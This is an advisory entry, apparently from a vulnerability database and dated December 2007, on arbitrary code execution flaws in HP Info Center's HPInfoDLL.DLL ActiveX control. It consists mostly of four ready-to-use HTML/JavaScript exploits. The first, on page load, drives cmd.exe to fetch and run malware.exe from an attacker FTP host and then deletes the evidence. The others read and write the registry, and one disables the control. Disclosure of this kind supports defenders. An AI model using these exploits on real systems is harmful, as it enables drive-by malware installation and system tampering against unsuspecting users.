HP Info Center HPInfoDLL.DLL ActiveX控件多个任意代码执行漏洞

🗓️ 14 Dec 2007 00:00:00Reported by RootType

HP Info Center HPInfoDLL.DLL ActiveX控件任意代码执行漏


                                                ///////////////////////////////////

//Remote code execution PoC exploit

///////////////////////////////////

&lt;html&gt;

&lt;head&gt;

&lt;script language=&quot;JavaScript&quot;&gt;

var attackersFtpServerAddress=&quot;attacker.ftp.server&quot;;

var attackersFtpUname=&quot;IDidntDoAnything&quot;;

var attackersFtpPassword=&quot;password&quot;;

var executableFileName=&quot;malware.exe&quot;;

var cnt,p;

function spawn2()

{

o2obj.LaunchApp(&quot;c:\\windows\\system32\\cmd.exe&quot;,&quot;/C echo open &quot;+attackersFtpServerAddress+

&quot; &gt;&gt; c:\\ftpd&amp;echo &quot;+attackersFtpUname+&quot;&gt;&gt; c:\\ftpd&amp;echo &quot;+attackersFtpPassword+

&quot;&gt;&gt; c:\\ftpd&amp;echo binary&gt;&gt; c:\\ftpd&amp;echo get &quot;+executableFileName+

&quot;c:\\&quot;+executableFileName+&quot; &gt;&gt; c:\\ftpd&amp;echo quit&gt;&gt; c:\\ftpd&quot;,0);

o2obj.LaunchApp(&quot;c:\\windows\\system32\\cmd.exe&quot;,&quot;/C echo cd c:\\&gt;&gt; c:\\ftpd.bat&quot;+

&quot;&amp;echo ftp -s:ftpd&gt;&gt; c:\\ftpd.bat&amp;echo start c:\\&quot;+executableFileName+

&quot; &gt;&gt; c:\\ftpd.bat&quot;,0);

o2obj.LaunchApp(&quot;c:\\windows\\system32\\cmd.exe&quot;,&quot;/C c:\\ftpd.bat&amp;del &quot;+

&quot;c:\\ftpd.bat&amp;del c:\\ftpd&amp;del c:\\&quot;+executableFileName,0);

}

&lt;/script&gt;

&lt;/head&gt;

&lt;body onload=&quot;spawn2()&quot;&gt;

&lt;object ID=&quot;o2obj&quot; WIDTH=0 HEIGHT=0

classid=&quot;clsid:62DDEB79-15B2-41E3-8834-D3B80493887A&quot;

&lt;/object&gt;

&lt;/body&gt;

&lt;/html&gt;

/////////////////////////////////////////

//Remote system registry read PoC exploit

/////////////////////////////////////////

&lt;html&gt;

&lt;head&gt;

&lt;script language=&quot;JavaScript&quot;&gt;

var hKey;

var sectionName;

var keyName;

ProcessRegistryData(parm)

{

alert(parm);

}

function spawn2()

{

var ret=o2obj.GetRegValue(hKey,sectionName,keyName);

ProcessRegistryData(ret);

}

&lt;/script&gt;

&lt;/head&gt;

&lt;body onload=&quot;spawn2()&quot;&gt;

&lt;object ID=&quot;o2obj&quot; WIDTH=0 HEIGHT=0

classid=&quot;clsid:62DDEB79-15B2-41E3-8834-D3B80493887A&quot;

&lt;/object&gt;

&lt;/body&gt;

&lt;/html&gt;

///////////////////////////////////////////

//Remote system registry write PoC exploit

///////////////////////////////////////////

&lt;html&gt;

&lt;head&gt;

&lt;script language=&quot;JavaScript&quot;&gt;

var hKey;

var sectionName;

var keyName;

var newKeyValue;

function spawn2()

{

var ret=o2obj.SetRegValue(hKey,sectionName,keyName,newKeyValue);

}

&lt;/script&gt;

&lt;/head&gt;

&lt;body onload=&quot;spawn2()&quot;&gt;

&lt;object ID=&quot;o2obj&quot; WIDTH=0 HEIGHT=0

classid=&quot;clsid:62DDEB79-15B2-41E3-8834-D3B80493887A&quot;

&lt;/object&gt;

&lt;/body&gt;

&lt;/html&gt;

////////////////////

// harakiri exploit

////////////////////

&lt;html&gt;

&lt;head&gt;

&lt;script language=&quot;JavaScript&quot;&gt;

function spawn2()

{

var ret=hpinfo.SetRegValue(&quot;HKEY_LOCAL_MACHINE&quot;,

&quot;SOFTWARE\\Classes\\CLSID\\&quot;+

&quot;{62DDEB79-15B2-41E3-8834-D3B80493887A}\\InprocServer32&quot;,&quot;&quot;,&quot;&quot;);

}

&lt;/script&gt;

&lt;/head&gt;

&lt;body onload=&quot;spawn2()&quot;&gt;

&lt;object ID=&quot;o2obj&quot; WIDTH=0 HEIGHT=0

classid=&quot;clsid:62DDEB79-15B2-41E3-8834-D3B80493887A&quot;

&lt;/object&gt;

&lt;/body&gt;

&lt;/html&gt;

14 Dec 2007 00:00Current

7.1High risk

Vulners AI Score7.1